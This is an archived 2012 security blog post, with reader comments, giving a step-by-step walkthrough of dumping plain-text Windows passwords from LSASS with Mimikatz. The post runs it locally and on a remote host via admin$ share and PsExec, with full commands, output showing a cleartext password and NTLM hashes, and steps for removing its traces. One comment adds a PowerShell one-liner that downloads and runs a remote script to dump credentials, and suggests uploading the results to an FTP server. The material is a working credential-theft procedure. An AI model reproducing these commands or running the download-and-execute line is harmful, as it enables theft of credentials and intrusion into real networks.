Tuesday, June 19, 2012

Using Mimikatz to Dump Passwords!

By Tony Lee.

If you haven't been paying attention, Mimikatz is a slick tool that pulls plain-text passwords out of WDigest (explained below) interfaced through LSASS. There are a few other blogs describing mimikatz on the net, but this will hopefully provide more details about the components involved and ideas on how to use it. The tool itself and the download page is in French, so it makes it “fun” to use if you don’t speak french :)

Download

Mimikatz can be downloaded from:

A couple of things to take into consideration:
  1. The tool has 32-bit and 64-bit versions – make sure you pick the correct version (systeminfo is your friend)
  2. You need to run it as admin (need debug privs)
  3. Needs a DLL called sekurlsa.dll in order to inject into lsass.exe and dump the hashes in clear text (important to know especially for a remote dumping)

Use Cases


The key feature of this tool that sets it apart from other tools is its ability to pull plain-text passwords from the system instead of just password hashes. If your intention is to stay within the Windows environment and pass the hash this may not be that big of a deal. However, if you are exploring the curious case of password reuse across different environments—the plain-text password can be quite useful. For example, you have compromised a “Good for Enterprise” server that has a web interface which is not tied into AD single sign on. It might be useful to have the Good admin’s plain-text password to try against the Good for Enterprise web interface. Additionally, unless you have significant computational power, you may not crack an NTLM password hash—thus pulling the plain-text proves useful once again.

What the heck is WDigest?


WDigest is a DLL first added in Windows XP that is used to authenticate users against HTTP Digest authentication and Simple Authentication Security Layer (SASL) exchanges. Both of these require the user’s plain-text password in order to derive the key to authenticate—thus why it is stored in plain-text.


Source: http://technet.microsoft.com/en-us/library/cc778868(WS.10).aspx

Running mimikatz


To run mimikatz you'll need mimikatz.exe and sekurlsa.dll on the system you're targeting. Once you launch mimikatz.exe from the command line you'll be provided with an interactive prompt that will allow you to perform a number of different commands. In the next sections we'll go over the following commands:

  • privilege::debug
  • inject::process lsass.exe sekurlsa.dll
  • @getLogonPasswords


Running locally (Windows 2008 R2 – 64-bit)


To enter the interactive command mimikatz command prompt, just launch the executable:
mimikatz.exe


You'll be presented with a banner and a prompt:
C:\Users\Administrator\Desktop\mimikatz_trunk\x64>mimikatz.exe
mimikatz 1.0 x64 (alpha)        /* Traitement du Kiwi (Feb  9 2012 01:49:24) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # 



Next, we'll need to enable debug mode with the privilege::debug command:
mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # 


Then we'll need to inject sekurlsa.dll into LSASS, but using the inject::process command:
mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 448
Attente de connexion du client...
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
                        Gentil Kiwi

SekurLSA : librairie de manipulation des données de sécurités dans LSASS
mimikatz # 


Finally, we'll pull any available login passwords using the @getLogonPasswords macro:
mimikatz # @getLogonPasswords

Authentification Id         : 0;126660
Package d'authentification  : NTLM
Utilisateur principal       : Administrator
Domaine d'authentification  : FS
        msv1_0 :        lm{ f67ce55ac831223dc187b8085fe1d9df }, ntlm{ 161cff084477fe596a5db81874498a24 }      
        wdigest :       1qaz@WSX        
        tspkg :         1qaz@WSX

--SNIP--

mimikatz # exit
Fermeture du canal de communication




You should see one entry for each user. Note the msv1_0 and wdigest fields. The former contains the LM and NTLM hashes for the Administrator user (defined by "Utilisateur principal") and the later contains the WDigest entry, which is the plain text password of the user!

Running Remotely (Windows 2003 – 32-bit)


Running mimikatz remotely, is more or less the same, but if you'll need to establish a connection on the system first. We'll do that here by using the built in Windows net commands and psexec.

We'll need to map the target remotely in order to copy over sekurlsa.dll. First we'll establish a connection to the servers admin$ share. Note that this will require pre-existing access to the server, so you'll need a valid credential to map the share:
net use \\169.254.73.91\admin$ /u:169.254.73.91\mimidemo


Then just copy over sekurlsa.dll:
C:\Users\Administrator\Desktop\mimikatz_trunk\tools> copy ..\Win32\sekurlsa.dll \\169.254.73.91\admin$\system32  



Finally, we'll use psexec to run mimikatz:
C:\Users\Administrator\Desktop\mimikatz_trunk\tools>PsExec.exe /accepteula \\169.254.73.91 -c c:\Users\Administrator\Desktop\mimikatz_trunk\Win32\mimikatz.exe

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com


mimikatz 1.0 x86 (alpha)        /* Traitement du Kiwi (Feb  9 2012 01:46:57) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # 


Now at our mimikatz prompt, we can just do the same as if we running it locally:
C:\Users\Administrator\Desktop\mimikatz_trunk\tools>PsExec.exe /accepteula \\169.254.73.91 -c c:\Users\Administrator\Desktop\mimikatz_trunk\Win32\mimikatz.exe

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com


mimikatz 1.0 x86 (alpha)        /* Traitement du Kiwi (Feb  9 2012 01:46:57) */
// http://blog.gentilkiwi.com/mimikatz



mimikatz # privilege::debug
Demande d'ACTIVATION du privil+¿ge : SeDebugPrivilege : OK



mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 432
Attente de connexion du client...
Serveur connect+¬ +á un client !
Message du processus :
Bienvenue dans un processus distant
                        Gentil Kiwi

SekurLSA : librairie de manipulation des donn+¬es de s+¬curit+¬s dans LSASS



mimikatz # @getLogonPasswords

--SNIP--

Authentification Id         : 0;184995
Package d'authentification  : NTLM
Utilisateur principal       : PowerAccnt
Domaine d'authentification  : SWITCH
        msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ 37**********************89 }
        wdigest :       j************************\  <-  Service account with Admin Privileges and suuuper long password   - Ouch


Authentification Id         : 0;62703
Package d'authentification  : NTLM
Utilisateur principal       : Administrator
Domaine d'authentification  : SWITCH
        msv1_0 :        lm{ 00000000000000000000000000000000 }, ntlm{ 4***************************d }
        wdigest :       ********************                                                        <- Admin account with suuuper long password    - Ouch

--SNIP--

mimikatz # exit
Fermeture du canal de communication




Cleanup


To delete sekurlsa.dll from the remote system:
del \\169.254.73.91\admin$\system32\sekurlsa.dll


Then just double check its not there with:
dir \\169.254.73.91\admin$\system32\sekurlsa.dll
Volume in drive \\169.254.73.91\admin$ has no label.
Volume Serial Number is 34C7-0000

Directory of \\169.254.73.91\admin$\system32

File Not Found



Finally, we can remove our connection to the server:
net use \\169.254.73.91\admin$ /del
\\169.254.73.91\admin$ was deleted successfully.



Final Thoughts

Insanely awesome tool--huge thanks to the author for sharing! This capability can be instrumental in leveraging password reuse. This makes another tool to add to the security toolbox for sure. Also note that Hernan Ochoa added this capability to Windows Credential Editor version 1.3 Beta using the "-w" flag.

Got some tips of your own? Let us know in the comments below!!!


9 comments:

  1. Tony,

    Thank you for the post. I was wondering if you have had any issues deleting the sekurlsa.dll file after injecting? I am testing this exact scenario and have successfully dumped the information but am unable to delete the injected .dll --- obviously because it is in use.

    I am trying to figure out a work around...

    ReplyDelete
  2. I had to remotely kill the process. All is well.

    ReplyDelete
  3. Thanks for posting your problem and your solution. :) For others out there that may experience the same issue, the following commands should help you kill the hanging process remotely:

    Kill by PID:
    tasklist /S {IP.Ad.dr.ess} [/U domain\username]
    taskkill /F /PID {PID} /S {IP.Ad.dr.ess} [/U domain\username]

    Kill by image name:
    taskkill /F /IM mimikatz.exe /S {IP.Ad.dr.ess} [/U domain\username]

    ReplyDelete
  4. it's just maybe because you don't unload sekurlsa.dll ( use "@"), or a proper "exit" in mimikatz (automatic unload...).

    ReplyDelete
    Replies
    1. Thanks! Actually that was there in the original version of this blog post but I somehow cut it out in transforming it from .txt to HTML. Fixed it above.. btw - great tool man!

      Delete
  5. I am a beginner but i need to ask one thing.
    It returns passwords of the logged in user, right?
    I opened a session using meterpreter, got the shell and ran it, and got passwords of logged in user.
    But what if i need passwords of other accounts as well? How do i do that, given user is logged in using his account only!

    ReplyDelete
    Replies
    1. This is "just" for logged in users ;) (or just logged in before)

      Delete
  6. I am trying this for the first time. At the final stage I am getting

    "Méthode 'getLogonPasswords' introuvable !

    which translates as method 'getLogonPasswords' found

    but no passwords are displayed.

    Your help/thoughts would be appreciated.

    Ger

    ReplyDelete
  7. Just type this into PowerShell as an administrator:

    powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

    This will give you the user password in plaintext in one command. Also, add this onto the end of the powershell script above:

    >> C:\Output.txt

    This will save the output to a file, making it even easier to collect your data. You can always change the path to make it easier to collect results, even upload to fpt etc!

    ReplyDelete